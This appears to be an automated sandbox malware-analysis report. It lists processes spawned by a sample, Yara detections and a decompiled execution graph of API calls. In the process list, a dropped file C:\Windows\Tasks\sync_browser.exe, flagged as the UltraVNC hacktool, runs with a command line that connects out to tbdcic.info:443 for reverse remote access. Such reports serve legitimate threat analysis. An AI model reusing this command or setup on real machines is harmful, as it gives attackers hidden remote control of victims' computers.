                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1724,i,3112944997856603396,2159099869268149404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff61f300000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Target ID:15
                                                                                        Start time:07:39:42
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 2
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:07:39:46
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 1
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:07:39:47
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 2
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:22
                                                                                        Start time:07:39:49
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\Tasks\sync_browser.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Tasks\sync_browser.exe
                                                                                        Imagebase:0x7ff67e7c0000
                                                                                        File size:1'945'368 bytes
                                                                                        MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000000.1454915020.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000000.1454823305.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Has exited:false

                                                                                        Target ID:23
                                                                                        Start time:07:39:49
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 8
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:25
                                                                                        Start time:07:39:57
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\Tasks\sync_browser.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443
                                                                                        Imagebase:0x7ff67e7c0000
                                                                                        File size:1'945'368 bytes
                                                                                        MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000002.1537485169.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000000.1534378586.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000000.1534448012.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000019.00000002.1537363283.00007FF67E899000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        Target ID:26
                                                                                        Start time:07:39:57
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 2
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:27
                                                                                        Start time:07:39:59
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 4
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:28
                                                                                        Start time:07:40:03
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 42
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:30
                                                                                        Start time:07:40:31
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff70f010000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:31
                                                                                        Start time:07:40:45
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 42
                                                                                        Imagebase:0x7ff6fab70000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:32
                                                                                        Start time:07:41:27
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 42
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:34
                                                                                        Start time:07:42:09
                                                                                        Start date:23/12/2024
                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:timeout /t 42
                                                                                        Imagebase:0xb40000
                                                                                        File size:25'088 bytes
                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:18.9%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:26.4%
                                                                                          Total number of Nodes:1626
                                                                                          Total number of Limit Nodes:16
                                                                                          execution_graph 11259 404852 11260 404867 11259->11260 11264 404895 11260->11264 11266 40269a ??3@YAXPAX ??3@YAXPAX 11260->11266 11261 40ce0a memmove 11262 4048a3 11261->11262 11264->11261 11265 404886 ??3@YAXPAX 11265->11260 11266->11265 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 ??2@YAPAXI 8536->8537 8538 4011be 8536->8538 8537->8538 8539 4011a1 ??3@YAXPAX 8537->8539 8538->8518 8538->8519 8539->8538 8542 402788 8541->8542 8543 401172 2 API calls 8542->8543 8544 402793 8543->8544 8544->8524 8552 402b71 8545->8552 8549 404210 8588 4041c4 8549->8588 8553 401458 2 API calls 8552->8553 8554 402b7f 8553->8554 8555 402b8f ExpandEnvironmentStringsW 8554->8555 8556 401172 2 API calls 8554->8556 8557 402bb3 8555->8557 8558 402ba8 ??3@YAXPAX 8555->8558 8556->8555 8599 4027aa 8557->8599 8559 402bea 8558->8559 8565 403ebc 8559->8565 8562 402bce 8603 4013a9 8562->8603 8564 402be2 ??3@YAXPAX 8564->8559 8566 401458 2 API calls 8565->8566 8567 403eca 8566->8567 8568 4013a9 2 API calls 8567->8568 8569 403ed5 8568->8569 8607 4027c2 8569->8607 8571 403ee2 8572 402771 2 API calls 8571->8572 8573 403eef 8572->8573 8611 403e41 8573->8611 8576 4013a9 2 API calls 8577 403f13 8576->8577 8578 4027c2 2 API calls 8577->8578 8579 403f20 8578->8579 8580 402771 2 API calls 8579->8580 8581 403f2d 8580->8581 8582 403e41 3 API calls 8581->8582 8583 403f3d ??3@YAXPAX 8582->8583 8584 402771 2 API calls 8583->8584 8585 403f54 8584->8585 8586 403e41 3 API calls 8585->8586 8587 403f63 ??3@YAXPAX ??3@YAXPAX 8586->8587 8587->8549 8589 402b71 6 API calls 8588->8589 8590 4041cf 8589->8590 8636 403f77 8590->8636 8592 4041dc 8659 404032 8592->8659 8594 4041e7 8682 4040ed 8594->8682 8596 4041ed 8597 402b71 6 API calls 8596->8597 8598 4041f3 8597->8598 8598->8529 8600 4027b6 8599->8600 8601 4027bc ExpandEnvironmentStringsW 8599->8601 8602 401172 2 API calls 8600->8602 8601->8562 8602->8601 8604 4013b5 8603->8604 8606 4013c7 8603->8606 8605 401172 2 API calls 8604->8605 8605->8606 8606->8564 8608 4027cf 8607->8608 8616 4013df 8608->8616 8610 4027da 8610->8571 8612 403e53 ??3@YAXPAX 8611->8612 8615 403e57 8611->8615 8612->8576 8615->8612 8620 4029d8 8615->8620 8624 403303 8615->8624 8617 401423 8616->8617 8618 4013f3 8616->8618 8617->8610 8619 401172 2 API calls 8618->8619 8619->8617 8621 4029ee 8620->8621 8623 402a02 8621->8623 8628 4025a5 memmove 8621->8628 8623->8615 8625 403312 8624->8625 8627 40332b 8625->8627 8629 402a90 8625->8629 8627->8615 8628->8623 8630 402aa0 8629->8630 8631 4013df 2 API calls 8630->8631 8632 402aac 8631->8632 8635 4025a5 memmove 8632->8635 8634 402ab9 8634->8627 8635->8634 8637 401458 2 API calls 8636->8637 8638 403f85 8637->8638 8639 4013a9 2 API calls 8638->8639 8640 403f90 8639->8640 8641 4027c2 2 API calls 8640->8641 8642 403f9d 8641->8642 8643 402771 2 API calls 8642->8643 8644 403faa 8643->8644 8645 403e41 3 API calls 8644->8645 8646 403fba ??3@YAXPAX 8645->8646 8647 4013a9 2 API calls 8646->8647 8648 403fce 8647->8648 8649 4027c2 2 API calls 8648->8649 8650 403fdb 8649->8650 8651 402771 2 API calls 8650->8651 8652 403fe8 8651->8652 8653 403e41 3 API calls 8652->8653 8654 403ff8 ??3@YAXPAX 8653->8654 8655 402771 2 API calls 8654->8655 8656 40400f 8655->8656 8657 403e41 3 API calls 8656->8657 8658 40401e ??3@YAXPAX ??3@YAXPAX 8657->8658 8658->8592 8660 401458 2 API calls 8659->8660 8661 404040 8660->8661 8662 4013a9 2 API calls 8661->8662 8663 40404b 8662->8663 8664 4027c2 2 API calls 8663->8664 8665 404058 8664->8665 8666 402771 2 API calls 8665->8666 8667 404065 8666->8667 8668 403e41 3 API calls 8667->8668 8669 404075 ??3@YAXPAX 8668->8669 8670 4013a9 2 API calls 8669->8670 8671 404089 8670->8671 8672 4027c2 2 API calls 8671->8672 8673 404096 8672->8673 8674 402771 2 API calls 8673->8674 8675 4040a3 8674->8675 8676 403e41 3 API calls 8675->8676 8677 4040b3 ??3@YAXPAX 8676->8677 8678 402771 2 API calls 8677->8678 8679 4040ca 8678->8679 8680 403e41 3 API calls 8679->8680 8681 4040d9 ??3@YAXPAX ??3@YAXPAX 8680->8681 8681->8594 8683 402771 2 API calls 8682->8683 8684 404100 8683->8684 8685 403e41 3 API calls 8684->8685 8686 404111 ??3@YAXPAX 8685->8686 8686->8596 8701 409f00 8702 40275c 48 API calls 8701->8702 8703 409f0a 8702->8703 8687 40ba20 8689 40ba3d 8687->8689 8688 40ba4c 8689->8688 8692 409f60 8689->8692 8693 409f6a 8692->8693 8697 409f8a 8693->8697 8698 401d13 8693->8698 8696 40275c 48 API calls 8696->8697 8699 401d20 8698->8699 8700 401d1a free 8698->8700 8699->8696 8700->8699 8705 40f227 _EH_prolog 8713 40f25a 8705->8713 8706 40f27c 8707 40f387 8740 4011d1 8707->8740 8709 40f3b1 8714 40f3be ??2@YAPAXI 8709->8714 8710 40f39c 8793 40ef85 8710->8793 8711 40f040 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8711->8713 8713->8706 8713->8707 8713->8711 8715 40f1fd 8 API calls 8713->8715 8717 40ce5c VirtualFree free ??3@YAXPAX ??3@YAXPAX ctype 8713->8717 8786 40f117 8713->8786 8790 40ef63 8713->8790 8733 40f3d8 8714->8733 8715->8713 8717->8713 8719 40f422 8796 40f090 8719->8796 8720 40f485 ??2@YAPAXI 8720->8733 8722 40f090 3 API calls 8722->8733 8726 40ef85 ctype 3 API calls 8726->8733 8728 40f502 8729 40f090 3 API calls 8728->8729 8730 40f527 8729->8730 8731 40ef85 ctype 3 API calls 8730->8731 8731->8706 8733->8706 8733->8719 8733->8720 8733->8722 8733->8726 8733->8728 8734 40f5c5 8733->8734 8750 40faff 8733->8750 8754 40e9ef 8733->8754 8799 40f776 ??2@YAPAXI 8733->8799 8801 40faac 8733->8801 8736 40f090 3 API calls 8734->8736 8737 40f5e4 8736->8737 8738 40ef85 ctype 3 API calls 8737->8738 8738->8706 8741 401235 SendMessageW 8740->8741 8742 4011df GetDiskFreeSpaceExW 8740->8742 8748 40121d 8741->8748 8742->8741 8743 4011f7 8742->8743 8743->8741 8744 402187 19 API calls 8743->8744 8745 401210 8744->8745 8746 408d52 27 API calls 8745->8746 8747 401216 8746->8747 8747->8748 8749 40122e 8747->8749 8748->8709 8748->8710 8749->8741 8751 40fb28 8750->8751 8805 40f962 8751->8805 9082 410a40 8754->9082 8757 40ea0c 8757->8733 8759 40eb20 9100 40e6d7 8759->9100 8760 40ea58 ??2@YAPAXI 8769 40ea40 8760->8769 8762 40ea7c ??2@YAPAXI 8762->8769 8769->8759 8769->8760 8769->8762 9155 40e45f ??2@YAPAXI 8769->9155 8787 40f126 8786->8787 8789 40f12c 8786->8789 8787->8713 8788 40f142 _CxxThrowException 8788->8787 8789->8787 8789->8788 8791 40cde2 4 API calls 8790->8791 8792 40ef6b 8791->8792 8792->8713 8794 40cdda ctype 3 API calls 8793->8794 8795 40ef93 8794->8795 8797 40e4dd ctype 3 API calls 8796->8797 8798 40f09b 8797->8798 8800 40f7a8 8799->8800 8800->8733 8803 40fab1 8801->8803 8802 40fad8 8802->8733 8803->8802 8804 40f841 112 API calls 8803->8804 8804->8803 8806 40f967 8805->8806 8807 40f99d 8806->8807 8809 40f841 8806->8809 8807->8733 8810 40f85b 8809->8810 8814 401815 8810->8814 8877 40ca28 8810->8877 8811 40f88f 8811->8806 8815 401831 8814->8815 8821 401827 8814->8821 8880 41017a _EH_prolog 8815->8880 8817 40185e 8924 40cb68 8817->8924 8818 401458 2 API calls 8819 401877 8818->8819 8822 401b51 ??3@YAXPAX 8819->8822 8823 40188c 8819->8823 8821->8811 8827 40cb68 VariantClear 8822->8827 8906 401370 8823->8906 8826 401897 8910 401551 8826->8910 8827->8821 8830 4013a9 2 API calls 8831 4018b6 ??3@YAXPAX 8830->8831 8836 4018c8 8831->8836 8856 401b17 ??3@YAXPAX 8831->8856 8833 40cb68 VariantClear 8833->8821 8834 4018e9 8835 40cb68 VariantClear 8834->8835 8837 4018f1 ??3@YAXPAX 8835->8837 8836->8834 8838 401953 8836->8838 8839 401914 8836->8839 8837->8817 8841 401991 8838->8841 8842 401978 8838->8842 8840 40cb68 VariantClear 8839->8840 8843 401926 ??3@YAXPAX 8840->8843 8845 4019b3 GetLocalTime SystemTimeToFileTime 8841->8845 8846 401999 8841->8846 8844 40cb68 VariantClear 8842->8844 8843->8817 8847 401980 ??3@YAXPAX 8844->8847 8845->8846 8846->8839 8848 4019d0 8846->8848 8849 4019e7 8846->8849 8847->8817 8928 4036f1 lstrlenW 8848->8928 8915 403387 GetFileAttributesW 8849->8915 8853 401b23 GetLastError 8853->8856 8854 401a07 ??2@YAPAXI 8857 401a13 8854->8857 8855 401b19 8855->8853 8856->8833 8952 40ca5c 8857->8952 8860 401afe 8863 40cb68 VariantClear 8860->8863 8861 401a4e GetLastError 8955 40133e 8861->8955 8863->8856 8864 401a60 8865 4036f1 88 API calls 8864->8865 8869 401a6e ??3@YAXPAX 8864->8869 8867 401abb 8865->8867 8867->8869 8870 40ca5c 2 API calls 8867->8870 8868 401a8b 8871 40cb68 VariantClear 8868->8871 8869->8868 8872 401ae0 8870->8872 8873 401a99 ??3@YAXPAX 8871->8873 8874 401ae4 GetLastError 8872->8874 8875 401af5 ??3@YAXPAX 8872->8875 8873->8817 8874->8869 8875->8860 9074 40c95f 8877->9074 8881 410283 8880->8881 8882 4101b5 8880->8882 8883 4101d2 8881->8883 8884 410288 8881->8884 8882->8883 8885 4101c4 8882->8885 8886 41024f 8882->8886 8893 4101f8 8883->8893 8984 40fefb 8883->8984 8889 410292 8884->8889 8892 4101e4 8884->8892 8894 41023d 8884->8894 8887 4101c9 8885->8887 8885->8894 8886->8893 8958 4132af 8886->8958 8898 4101cf 8887->8898 8904 4101fd 8887->8904 8889->8894 8889->8904 8892->8893 8972 40cc18 8892->8972 8967 40cb6d 8893->8967 8980 40cbf3 8894->8980 8897 410265 8961 40cbac 8897->8961 8898->8883 8898->8892 8899 40cb68 VariantClear 8903 40185a 8899->8903 8903->8817 8903->8818 8904->8893 8976 40cc38 8904->8976 8907 401387 8906->8907 8908 401172 2 API calls 8907->8908 8909 401392 8908->8909 8909->8826 8911 40133e 2 API calls 8910->8911 8912 40155f 8911->8912 8999 401429 8912->8999 8914 40156a 8914->8830 8916 4033a4 8915->8916 8920 4019f3 8915->8920 8917 4033a8 SetLastError 8916->8917 8918 4033b5 8916->8918 8917->8920 8919 4033be 8918->8919 8918->8920 8921 4033cc FindFirstFileW 8918->8921 9002 40335a 8919->9002 8920->8853 8920->8854 8920->8855 8921->8919 8923 4033df FindClose CompareFileTime 8921->8923 8923->8919 8923->8920 8927 40cb24 8924->8927 8925 40cb45 VariantClear 8925->8821 8926 40cb5c 8926->8821 8927->8925 8927->8926 8929 402771 2 API calls 8928->8929 8930 403712 8929->8930 8931 401172 2 API calls 8930->8931 8932 403722 8930->8932 8931->8932 8934 403770 GetSystemTimeAsFileTime GetFileAttributesW 8932->8934 8937 403814 8932->8937 9043 401b75 CreateDirectoryW 8932->9043 8935 403785 8934->8935 8936 40378f 8934->8936 8938 403387 22 API calls 8935->8938 8939 401b75 4 API calls 8936->8939 8942 403795 ??3@YAXPAX 8936->8942 8940 403844 8937->8940 8937->8942 8938->8936 8950 4037a2 8939->8950 8941 408dbf 57 API calls 8940->8941 8947 40384e ??3@YAXPAX 8941->8947 8949 403859 8942->8949 8943 4037a7 9049 408dbf 8943->9049 8945 403808 ??3@YAXPAX 8945->8949 8946 4037ba memcpy 8946->8950 8947->8949 8949->8839 8950->8943 8950->8945 8950->8946 8951 401b75 4 API calls 8950->8951 8951->8950 9071 40ca45 8952->9071 8956 401172 2 API calls 8955->8956 8957 401358 8956->8957 8957->8864 8959 40133e 2 API calls 8958->8959 8960 4132bc 8959->8960 8960->8897 8988 40cb96 8961->8988 8964 40cbd1 8965 40cbec ??3@YAXPAX 8964->8965 8966 40cbd6 _CxxThrowException 8964->8966 8965->8893 8966->8965 8968 40cb24 VariantClear 8967->8968 8969 40cb79 8968->8969 8970 40cb92 8969->8970 8971 40cb7d memcpy 8969->8971 8970->8899 8971->8970 8973 40cc21 8972->8973 8974 40cc26 8972->8974 8975 40cb96 VariantClear 8973->8975 8974->8893 8975->8974 8977 40cc41 8976->8977 8978 40cc46 8976->8978 8979 40cb96 VariantClear 8977->8979 8978->8893 8979->8978 8981 40cc01 8980->8981 8982 40cbfc 8980->8982 8981->8893 8983 40cb96 VariantClear 8982->8983 8983->8981 8985 40ff0d 8984->8985 8986 40ff29 8985->8986 8995 40cc5f 8985->8995 8986->8893 8991 40cb24 8988->8991 8990 40cb9e SysAllocString 8990->8964 8990->8965 8994 40cb2c 8991->8994 8992 40cb45 VariantClear 8992->8990 8993 40cb5c 8993->8990 8994->8992 8994->8993 8996 40cc68 8995->8996 8998 40cc6d 8995->8998 8997 40cb96 VariantClear 8996->8997 8997->8998 8998->8986 9000 4013df 2 API calls 8999->9000 9001 401439 9000->9001 9001->8914 9008 402ff3 9002->9008 9004 403363 9005 403384 9004->9005 9006 403368 GetLastError 9004->9006 9005->8920 9007 403373 9006->9007 9007->8920 9009 403000 GetFileAttributesW 9008->9009 9010 402ffc 9008->9010 9011 403011 9009->9011 9012 403016 9009->9012 9010->9004 9011->9004 9013 403034 9012->9013 9014 40301a SetFileAttributesW 9012->9014 9019 402ee6 9013->9019 9015 403030 9014->9015 9016 403027 DeleteFileW 9014->9016 9015->9004 9016->9004 9020 402771 2 API calls 9019->9020 9021 402efd 9020->9021 9022 4027c2 2 API calls 9021->9022 9023 402f0a FindFirstFileW 9022->9023 9024 402fc2 SetFileAttributesW 9023->9024 9038 402f2c 9023->9038 9026 402fe5 ??3@YAXPAX 9024->9026 9027 402fcd RemoveDirectoryW 9024->9027 9025 401370 2 API calls 9025->9038 9029 402fed 9026->9029 9027->9026 9028 402fda ??3@YAXPAX 9027->9028 9028->9029 9029->9004 9031 4027c2 2 API calls 9031->9038 9032 402f91 SetFileAttributesW 9032->9026 9036 402f9a DeleteFileW 9032->9036 9033 402f5c lstrcmpW 9034 402f72 lstrcmpW 9033->9034 9035 402fa5 FindNextFileW 9033->9035 9034->9035 9034->9038 9037 402fbb FindClose 9035->9037 9035->9038 9036->9038 9037->9024 9038->9025 9038->9026 9038->9031 9038->9032 9038->9033 9038->9035 9039 402ee6 2 API calls 9038->9039 9040 401526 9038->9040 9039->9038 9041 4013df 2 API calls 9040->9041 9042 401530 9041->9042 9042->9038 9044 401bb6 9043->9044 9045 401b86 GetLastError 9043->9045 9044->8932 9046 401ba0 GetFileAttributesW 9045->9046 9048 401b95 9045->9048 9046->9044 9046->9048 9047 401b96 SetLastError 9047->8932 9048->9044 9048->9047 9050 402187 19 API calls 9049->9050 9051 408dd3 wvsprintfW 9050->9051 9052 408ea2 9051->9052 9053 408df4 GetLastError FormatMessageW 9051->9053 9056 408cdb 27 API calls 9052->9056 9054 408e22 FormatMessageW 9053->9054 9055 408e37 lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 9053->9055 9054->9052 9054->9055 9060 408cdb 9055->9060 9058 408eae 9056->9058 9058->8942 9061 408d50 ??3@YAXPAX LocalFree 9060->9061 9062 408cea 9060->9062 9061->9058 9063 407c87 4 API calls 9062->9063 9064 408cf9 IsWindow 9063->9064 9065 408d10 IsBadReadPtr 9064->9065 9068 408d22 9064->9068 9065->9068 9066 407ce8 22 API calls 9067 408d48 9066->9067 9070 407a5b ??3@YAXPAX 9067->9070 9068->9066 9070->9061 9072 40ca28 2 API calls 9071->9072 9073 401a46 9072->9073 9073->8860 9073->8861 9079 40c88e 9074->9079 9077 40c993 9077->8811 9078 40c96e CreateFileW 9078->9077 9080 40c898 CloseHandle 9079->9080 9081 40c8a3 9079->9081 9080->9081 9081->9077 9081->9078 9083 410a59 9082->9083 9098 40ea08 9082->9098 9083->9098 9185 410817 9083->9185 9085 410c33 9086 40ce5c ctype 4 API calls 9085->9086 9086->9098 9088 410817 7 API calls 9089 410af5 9088->9089 9089->9085 9090 410b25 9089->9090 9192 40ce5c 9090->9192 9092 410b2e 9093 410bab 9092->9093 9095 4107a2 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 9092->9095 9093->9093 9094 40ce5c ctype 4 API calls 9093->9094 9096 410be7 9094->9096 9095->9092 9097 40ce5c ctype 4 API calls 9096->9097 9097->9098 9098->8757 9099 406eb0 InitializeCriticalSection 9098->9099 9099->8769 9226 40e214 9100->9226 9156 40e46e 9155->9156 9157 4107a2 4 API calls 9156->9157 9158 40e485 9157->9158 9158->8769 9186 40cdda ctype 3 API calls 9185->9186 9187 410823 9186->9187 9196 40cd11 9187->9196 9189 41082d 9190 41083f 9189->9190 9191 40ef63 4 API calls 9189->9191 9190->9085 9190->9088 9191->9189 9193 40ce3b 9192->9193 9204 40ccfd 9193->9204 9197 40cda5 9196->9197 9199 40cd24 9196->9199 9197->9189 9198 40cd33 _CxxThrowException 9198->9199 9199->9198 9200 40cd63 ??2@YAPAXI 9199->9200 9201 40cd95 ??3@YAXPAX 9199->9201 9200->9199 9202 40cd79 memcpy 